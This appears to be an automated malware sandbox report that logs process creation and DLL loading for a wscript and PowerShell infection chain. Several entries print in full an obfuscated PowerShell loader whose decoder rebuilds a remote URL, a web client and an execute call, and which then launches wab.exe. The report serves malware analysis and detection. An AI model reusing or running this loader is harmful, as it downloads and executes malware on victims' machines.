';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
